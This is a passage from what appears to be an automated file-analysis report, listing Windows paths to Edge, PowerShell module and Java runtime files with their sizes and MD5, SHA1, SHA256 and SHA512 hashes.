                                                                                                                                                                                                                                                  2cbfc7219ffb6c1a0dd80668a2be3cb9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2ce733560de28c8829e10f448e47aabc1592fc6f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  bb9d76c505d29db5d1b1c1539ba1aec1b58360d1982d0598115356363af62c61

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  c41b7befeadb93d40b4db91db65eb72f18d28d1dfd66fa24ce8ca1fec409d8eb7e2650f8667877f521b831f83073fdc51ffdeb0a687e045a10c6a3c07639f1c7

                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\notification_helper.exe.manifest

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c613a3660219139a5be8338422d7f547

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8dd02379b7b139ad9aa5b083acf0b695b2c21235

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b7b9d5ceffb1afa7f5209d44d8308da525c415a88f2778f79e784c81269efb55

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4f8e93a827d4510776970104c467292abd240462e5eda8fed2a2dd1bcc9335ca481fbcd299823ec27f8782e380acfdf36516aadf488618ebce5d90c7c5ae8d2a

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\de-DE\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  09e591e0231559ffb165c54b0a820629

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  8afaec133482dec800877332724dd7ca1d578811

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  637fe04700fe06f0650444cac92714392f44f44a9f708fb869ba36b46756f65d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  74668ae44114e5867ee4522541bb1e992a516d7a217a809292682b219cb6f14a954ba129795697e4cc8bd4f72e3e02d62492042311e20a4647d532d1abe8f545

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\en-US\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c15b9aa2cf3ee8f61b07744da1578f05

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  4f0f198413122cd5cf9676788527d93736c5ed67

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  3b0b71e2af406ed363601f6198c0828d4e4a9ed4408243ad62c056c25e193e41

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9523ce8cc4f0e19ada7054ef6d9f62156b79e4c4bd2c28fcebd4bf519f91689be2aab982c3d2f3c862ad99d15c911d2634f8f50f2bfa0800fc6d08fa2edd55c9

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\es-ES\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a821bf5a09704d4d1caab80355bff243

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ac86d0e0210bf2cd7a5101cd62f69337b9996073

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  5a20b098327e33089333966ceb1dd5f0bc9328f2a7f1f5405baf02065d02a47a

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  85e6ab7305d8bcc66314d0a30ef186c77a3ea5557cf57b72d7415562a74e14df01b4d57cda00d258f7cc35041444d8bba8520a7b8d7d05dd28ec9a17457feba8

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\fr-FR\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  82a18c9a72f9a1aa578f2bd33a70de53

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  82012637012553bf60fb46ede0e8486e9ea27e63

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  db115e392d9a71aee37a65bdb14d53f0cb5ddb6ffd6679cada3fe1440e6b6024

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4afeb50cff6f9c527486be9d2bb6145707354926d4f9acfefb1d9b444aff9e938cdf3ab913714b671c93ea9312134f93a0c1ff4d124b514f2db02cf0711f4d46

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7df9be4f69e9c7c64de469a2ee5f12c0

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  c35a2f0958c0575736ff17de026e4ab0a9fc1a00

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  fcd41dd5d97508125eb683d71e6deb816e390878915f7b143d1056eb8a58a4a0

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b4d7142d865d8d3684b32dd0a06808d9522a51fc489006814fd827fce469d9f6a26994af65e10089b004ad7b823f7b0051792db7c5c89d3f14fc8acd95f767c0

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  9e395eff0bea102e0b538802919ba4ce

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  68fdda50ba25f5f1efb3c4b8e71cedeb6653ea97

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  cc0ad25d822315105a9a6bb49a6e8d39d9d5e8437d425eb74f29eefc2e586d5b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  022b10510418599faf53f7749156ce76aebaaec6cd97770df4d30429187c16c7b403f1b58ce7b50725516d3aa307965ae42d11fec60f30e58d8e505225348f4b

                                                                                                                                                                                                                                                • C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\uk-UA\MSFT_PackageManagement.schema.mfl

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  cf35c53d77953cfa31533d21c3771a22

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  0da31b9749d672e4e840e15213acbbc64d13319a

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  f95520b7ad1cc62d4a3182dd69730c305f6cfd6c5aea1db1788586e1bada4382

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  5a17ff65626d8ca354890c7ca47513ab180d49529f8740a95e46d2d13c5ae82ad9813dabb4eaedba325fb3ad05ec0b13838d4c367a19fdbd8046abbabc9a2c6c

                                                                                                                                                                                                                                                • C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  674B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  5a65762a2841db94b9c2d58200eb3a0c

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  66f5df0969f2e9976f906292471052e3bbb11226

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1436d4ade978a043e67b9207556abda66515803c10bdd82f510c2e6464557008

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  4d3234b9fec7de649324f78798a0c164856860bf31719e4dc2b5222e20bc519fce60b89d9767094df6fcd30b966333de4d0782a04eb6c62dda7b2bf0d6598020

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\COPYRIGHT

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  6ebfa25affb28691f1ec3b5b742cc2c7

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7e01cd6539ac53a607f0f7789e7f18d3500a9526

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a44067d98412e0d188023a514e7a30bf955808a260a41772695dde932c08b56e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  17482b7d5774e872210ceabeb5f99da74cb5452f9784634e88d846c09c4b889f98bb3ddca0f6d48f0c3b123e7ca84ba1b5eeb0e7cbde33c2bc2e316ed4d39469

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\LICENSE

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  565B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  d86401ef7c6ebb28b032b1de82a0018d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  51bb19c506174092ac2df8a4df8f56a10122cf3e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  242c39e9a250194abdcfa8b10556daf085a6a67dcf9006cdc6cbbf39bd1f19a3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  19b2ada31c4e44890e181c8c6180e72e18d85b9250122eba37a136a87d0e91b3819321e9a08e9e4762a65fef9ab5811b2662026e04b7e956d5e3aef367be6d40

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  711B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  a783db69f9000b5aa93d415e0c0b85a9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  da25ac0d0cf02eaae9935c03cad823714211bcdd

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  a112d4195ba7a7524c791e64e640d0821e63d140d13ce2d4005be8d8be396f99

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  1023c46f600d26ba7a5b89194c33828626c52c08bda606d2b5caecb9828ffcf816332cf946d33ed58ef09b828357707efdb011cf544d21d3bade0ac3dd964bcc

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  711B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  0960778a9e83dc810d905aa2b2cce94e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  742b58f4f20d9f3abe7c9c300b31323540466e34

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1d3200bc613870acd0047fa61bdc155719053279e6ada639eb5bdcf11a55332e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  e8f6db197f92f21948b5a6b4707a099738062e251a29e447b00f9826aab8115a39a1eedac1cea642b552fa5bd67552617633bfb66d55256ed1f244e63af91f60

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\directshow.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b4d155fb972f282d2f1b5ba9f0be31c2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2b13397ddb7c8188178e8432774de6a4ea18111c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  1a7e43075e4fbb8f3d16f49a807e33f79f21d8b2fb52b1310374c1c9b006c014

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  697ea07a739a845c6f7daed15188d3bbe2ce7646251acd7729e2507dcfb69135af1334609e159c1ec672b46e7c76ea6b24b958baf52fb0504d320dcce4c9bf66

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\glib.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  eaf22e1dfec6860c18f241fa22304000

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  40915dd58e3b452cee7cb69851673a27d9bbec66

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  b9180076eeb325cafd04073d897c5cb5ff1743e79da3301611df7503041a36da

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f6e8e054ec86aca9559918cbcccbba49d911770aad0a8cd054d58215b2841985c89c9550215ab03c225a841b05faa1d239b5a8b8d9e967a65998ca96ad32a0c6

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  34KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  3b80d7511ba6f7e606948138438448b9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  04f6fbd884e6a90a35490c60577b159e6722a852

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  8cb06f844b376de5e8644cc8efab481ac4d31fef27d8fba4471015f497e3ec99

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6bedfaea6946ec697c80823e2bd2c1e3a9fe9844d586928d6fa958475c44a10ef87543cd0588cb9b23831a0dc14d8a9cae91225c957e12dce57730d2c16e115c

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  4d561e8ae753e977c4dfcfb406b0e7ea

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2261faeafb651363537db8078048a480275e6f5f

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  de588b6cc4047f558de9f9dd4480ee166f1ff2d01adb110f90cdf0c0203fc0c3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  b50e8cde5f03df8e7171bd2767a0ea9b46525823be22b8ec43651af86b98dc1b37900da0666e594145b79b3d3845f7383012168d4b5635c8e988c8662456a41a

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\jpeg_fx.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  bcef6c98f0e8dfa2dc89c6418f32d73a

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ea43fa40488703e5e880ebfce7a1da1baff2d541

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  7ecfbb50a61ede91874a124dc76ef1eba439538dbfb1e786808826d5113b0956

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8d188fc74b076b781efd92c75aadb6550296d76ce055886c88cc3779e01742818c9de623370cb46473e0b8bbaa1159861811543292ffc0dae1e296ad60649909

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  32c70bc38da65e2f5af5812c1dfa900e

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  5c4d46eb1debbc1d3f99304042a45e8d46bf8d2e

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  0d3408a1646f7a3e4a4c9feca30101db0a1973e718a9c9052158967834eb67e3

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  2b5cdfc18fde899afaa6912df38231d4b0432a478f95c7ff9e35228c4b277e8399998a855fac3e7cf763c6eea44bee7a15bb8ba78e584d21199ffba7818a9e6f

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\libxml2.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  60b7035be46aa69ab3839390b3184905

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7336b9bfbcdd8005e63632b0cea98db3c94cc5a2

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  bb1d9cf6e6e69ed4d84d11eb09ece717c271b7ab02e497c5e5e38c0fdcd23bdd

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  9387e1cafa6466634ddf6ca8c6a670c0803fc1f7e9ecda77651f262d11d6184aa45fc8864b744e1e83bf304e1e02aebba8c641c09771551bfbf94ff5d5844ac2

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\libxslt.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b1e4e7e7f4711dd80dd9b37a480977f9

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  36a0be469997f0ff270e853f2c6108cd5ac92ad6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  535189514ae35e62e78d528b6a6aa54694583b27755b489c9e634830d5f0a46d

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  70e399607784f8fe2132523350782cc9d009a7380f9ba348d960284f59421f6a2a2a61a0ffbac24e2ac8f46ef130eca03fbc1520237f41d05e7674241fac7729

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\mesa3d.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  6KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  068adfd3b5128265c5f48049188096d4

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  3a71e400fabc73f09014fa2cbc39ef79f5822a86

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  699b1cfc7b088c651df1e052172b7d006d6c0a8f6f7a62fdd9398d012893815f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  f9ab5a050cd48d136e1e7f2b93662b4ce1b72709567264d6699fe829da32eaa1a6688f2e422c3f3349106320b5f1bc3a776c99156de5fc7d56b279790e95fd96

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\public_suffix.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  17KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  b585d1d50b611027b540e192295b80c1

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  dc3acfcb2097030c7c70d526c72de58fa90d3c9c

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  4c0bec7847c89a2f4ed45aa41af2b28aa532e66d535c0f2e4a56c0221dd070c7

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  06ba33df35e55714f1916cde3f245f9f84191a568d144f7649b3996e38e752aff19e69e8b4da625276bfce531e07df12b16b87a74a43f375f10483a4ec190f68

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\javafx\webkit.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  320KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  c0d0252b9eea227679eec098810097f2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ca54cdf6d7f1e7621831db1261328eeaa85094fa

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  094907028e418d70260a55b25b419e88fc66eff9aa4d9206608c3478ba130b0e

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  7d4f082a3ec46b1adca37aa3badfaa948a62e5a6b4419802ec24c075adbc06972d159fb097838ff90ab3616a12d052d86c699fab5ae8c108818d0f6903c9988a

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\asm.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  279c48f2b93782f315bcca47623c02ea

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2dc22b6c972ea4a471d0fb54047f1d51fe972f14

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  3655ce4d6ce181f1fafa7eedd9e6c77f8f8b5bd6133d902d037863a69bd49c6f

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  8d530d70cf73aaad40b75ecf9f70c0e98766987ee8de5fd06dd086164a36d7634013d7dd1739b9d2f5d9cc32279e84bb81a6178712ba052db789ea925afb2dc2

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\bcel.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  502a9e53f614ea4db921edbdd478cbd6

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  b56823bd6e2d885790302e0b73e030c0b956e020

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  d1be37a2c816ba0c6ed835ed7e5526284d6d3c8c5d74fe6906c27899fcd37d17

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  6fec8064931d4120dfb9f70d17d1a7fb3d7c2400c41d141cd562eaed11aafd0ac441f6610d673ebd121434118f5519ba273859bf3991f9f2d9a127d9eae611fd

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\cldr.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  09693aeacc5ea286f66eb85511ce45c5

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  fa923a87ab11c83b79a7e8f0cfcf9b07dd3aa2c6

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  361cda1850671005b4579573c35ce9c056554fa57550a19c2aa01d034f8b6200

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  d1f82f0bf1f11d7f2dae0868f41633c1c5b51dced2e40213f0a25f35b10e528b8bd94f8fa73ff1c2f06f15cdd75e86e8ef0f0e733d76d4c3c2f84bb27462c0bb

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\colorimaging.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  683B

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  69615ce9f4f0afd34ce282479d199f26

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  be0601005d9bc4715551beb8fc50b6e0096295e3

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  accc32592dc6aa1289a73a9b254f6e014e34e7825aaedcb1a9c20b76882b5f1b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3e85e009226437e43480e598766f866108327955db184ad88c2eac6401585bd7200ca0df1ad743163f849477a9d8e9fe7e771f48b8e6dc8a3fd69679ed2197a7

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  23a5a0e1b2f31f2161939205e45efb5d

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  ae233c6672308d0488fe84a209a743f0e135d433

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  6ab78688784c142fb681d19afb8cbd4925f557fb6a38ae66d44c855dffec5794

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  901164fffd01cc79eecac259f07f978ab7fe8715a9aa4fa5369d1fcbcb41bd429984c35f6e136b5b35b1e6167c1575493ee615741b36fdd09a661999b9bd8c43

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\dom.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  e20e39aa59946bd64ee2d25fffab5d83

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  7b353580a5635b67ddaa5a8cdb05ff360c7e8970

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  2ce6934dcf67aad80b5d00740a6dcad6e9948631a23822b3813e18c92dd1f0a1

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  078578cccbfc0d80f474c288680a8afb730c57c13821716babcde3a4faf6de86b9fc960b43cdcfedef6ef14516473eaff7a6572796a4e459e85c044d30c3fbf2

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  db47686b94aa41086b7e0a5a2b22aa62

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  2788e5765d06addd034752dec42e4e912fa03754

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  c58fec9b9a6348348cf59d8495490f806af5d8eb2992890622996092266c490b

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  ced33f25bed5e5a4f16255c523d8f8dc3f3a5525922ecd64a9e30c9c6d706116b52bfb0dbb5e424ae229fb44c02260521fd9e2bb3d08e685b515efa3f2212526

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\ecc.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  29KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  7fbea2bfd2b6b99e3102b33301a34bc2

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  513e30f22cd0bed86f8567d5b446ef7c6d8c55df

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  cac73aabd8419276c2a021804b3a56a175c56ecfd9bf9afce46e3fd18ea62593

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  3b0cc1c3158d6097533688dc13b84ff7416d949266472f9e087d1a5b954d3ae9f990b62dc0fd65561926d25c554059dfba69ea6bb2877a36c1b339dc9466a3b8

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\freebxml.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  913365f38e8760b1c033617ffe482384

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  da2fa8f9604620d5f0115938c137af6e440e39a7

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  5f63e895413fd130c8bfc1a3a6d819b33ffc47982af706299dc50f0038023a91

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  fe9d96da1cb8119d2dd4d4fecd3743e00c9cbeb97a7e5ca6ed90773f44bf5d92b00a581d92c154fb2684e9cb3c79d2fc901c0f6fe47bad765347873f828a208c

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\giflib.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  679d41aa3e7280ce7b059c45f867b8c3

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  150a792213012f068509c94a567238d95d4ea4b3

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  446b091bc8a579b6213d4bb321b80f66f0922727f831b4e85ea21f020d172bfa

                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                  65df39a7be858b8acc1512e8b1fcbc95c80c5c14237c20e5cf382e0567e828b30668ec322e8260bd1426c1b4ea24083ea0f8c88d35179edbe00bf6c040b230e1

                                                                                                                                                                                                                                                • C:\Program Files\Java\jre-1.8\legal\jdk\icu.md

                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                  79242b6550b375a8e00a9b94abe59377

                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                  e62dcc7a0c841a28dae0d737080ddea4d7805fbc

                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                  56bf5371a7464211e9c8bb6c3cfc5f1c00a7f6b5bc8b9e2f815a7a6fdbc0cc8c

